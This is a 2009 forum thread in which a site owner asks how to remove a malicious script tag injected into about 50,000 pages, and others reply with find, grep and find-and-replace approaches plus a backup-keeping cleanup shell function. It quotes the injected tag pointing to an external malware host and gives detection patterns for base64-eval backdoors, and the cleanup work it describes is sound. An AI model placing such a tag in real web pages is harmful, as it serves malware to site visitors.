
Urgent help.

Discussion in 'BlackHat Lounge' started by carsonrathi, Nov 17, 2009.

  1. carsonrathi

    carsonrathi Senior Member

    Joined:
    Mar 12, 2008
    Messages:
    1,106
    Likes Received:
    759
    Hey Guys,

    Someone has infected my whole site; on every page I can see one line of code, i.e.

    <script src=http://bigcjewelryandloan.com/images/brochurefront.php ></script>

    Google has started showing that 'this site may harm your computer' on my sites.

    There are almost 50K pages on my web host; how do I remove this line from each of my files?

    Thanks,
    Carson
     
  2. riekal

    riekal Junior Member

    Joined:
    Aug 11, 2009
    Messages:
    121
    Likes Received:
    38
    Occupation:
    Marketing & Retargeting Boss
    Location:
    TN
    Do you have SSH access to your web hosting? If so, then you're probably running a distro of Linux, which means that you can use the shell for string manipulation. Other than that, all I can think of is downloading the webpages, editing that line out and uploading them all back.

    If you DO decide to choose the second option, I'm sure you could find a utility that can find & replace text in multiple files with a press of a button.
     
  3. carsonrathi

    carsonrathi Senior Member

    Joined:
    Mar 12, 2008
    Messages:
    1,106
    Likes Received:
    759
    Hey Guys,

    Thanks for replying.

    However, downloading 50000 web pages and re-uploading them is in no way an option. I am sure that if a hacker can insert it on all pages in some way, then it can also be removed (probably in the same way).

    Note: I will pay $50 to whoever can REMOVE that virus from my site ASAP.
     
  4. wawawiwa

    wawawiwa Regular Member

    Joined:
    Jan 24, 2009
    Messages:
    221
    Likes Received:
    87
    It may take up to two weeks before Google will take that notice off the search engines.
    I can take a look at it. I have fixed a couple of infected sites before.
    Let me know if you are interested.
     
  5. toph421

    toph421 Newbie

    Joined:
    Feb 8, 2008
    Messages:
    34
    Likes Received:
    84
    Well dude, download all the pages, press CTRL + F, enter that code, then replace it with (empty space); it will be resolved within 2 minutes. You can also connect Dreamweaver to your server and remove this code remotely from all pages.

    Thanks

    My 2 cents;)
     
  6. nasgorkam

    nasgorkam Newbie

    Joined:
    Apr 8, 2009
    Messages:
    33
    Likes Received:
    144
    Occupation:
    web designer of hexno.com
    Location:
    j.town
    If the content is in a database, then you can quickly edit it via a casual MySQL query and replace.
    If the content is HTML and you run Linux, you can try riekal's suggestion: using the shell for string manipulation.

    Don't try to connect your Dreamweaver to the web with that huge amount of content; you'll find your program hanging for a long time.
     
  7. WeWatch

    WeWatch Newbie

    Joined:
    May 31, 2009
    Messages:
    2
    Likes Received:
    3
    These types of infections are running rampant through websites. The only thing that will change is the domain, everything else will be pretty much the same.

    This code is remotely injected into various web pages, like index.html, index.php, etc., but it can also be inserted into various other pages.

    If you have SSH access to your site you can use these strings to find it:

    #1: find / -name gifimg.php

    This file is normally used to remotely inject websites with the code du jour. Delete this file. We mostly see this file in any and all images folders.

    #2: from the root of your website type:

    grep -r eval\(base64_decode * | more

    This will give you a list of files that are also used to remotely infect your website.

    #3: grep -r bigcjewelryandloan * | more

    From there, I'm sure there are plenty of grep/vi/utility strings you could use to automatically search and replace the malscript you found, but I would start with the list of files produced by the #3 grep command and remove them.

    I always download all the files from a website and use PowerGrep to automatically find and replace. For some reason, Windows search doesn't always find these strings.

    Contact me through IM if you want help. I do this all day long and would do it for free for you.
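
The replies above converge on a recursive find-and-remove run over SSH. As an added example (not code from any poster in this thread), the function below strips one exact injected string from every text file under a web root and keeps a copy of each infected original. The function name, argument order and backup directory are assumptions; it expects file names without newlines and a backup directory outside the web root.

```shell
#!/bin/sh
# Added example: strip one exact injected string from all text files under a
# web root, keeping the infected originals in a separate backup tree.
# Usage: strip_injected_tag ROOT TAG BACKUP_DIR   (names are assumptions)
strip_injected_tag() {
    root=$1 tag=$2 backup=$3
    [ -d "$root" ] && [ -n "$tag" ] || return 2
    mkdir -p "$backup" || return 1
    # -F: fixed string, so dots and slashes need no escaping
    # -I: skip binary files (images, archives); -l: list file names only
    grep -rlIF -- "$tag" "$root" | while IFS= read -r f; do
        rel=${f#"$root"/}
        mkdir -p "$backup/$(dirname "$rel")" || exit 1
        cp -p "$f" "$backup/$rel" || exit 1   # infected copy kept for review
        tmp=$(mktemp) || exit 1
        # Cut out only the injected string, not the whole line: the tag is
        # often appended to a line that also holds legitimate markup.
        TAG=$tag awk '
            BEGIN { t = ENVIRON["TAG"]; n = length(t) }
            {
                while ((i = index($0, t)) > 0)
                    $0 = substr($0, 1, i - 1) substr($0, i + n)
                print
            }' "$f" > "$tmp" || exit 1
        cat "$tmp" > "$f"    # overwrite in place so owner and mode are kept
        rm -f "$tmp"
        printf 'cleaned %s\n' "$f"
    done
}
```

This removes the visible symptom only; the injector files that the `find` and `grep` commands in the post above look for still have to be located and deleted, or the pages will be reinfected.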
     
  8. sidddd

    sidddd Power Member

    Joined:
    May 15, 2008
    Messages:
    749
    Likes Received:
    460
    Is this a WordPress site that is hacked?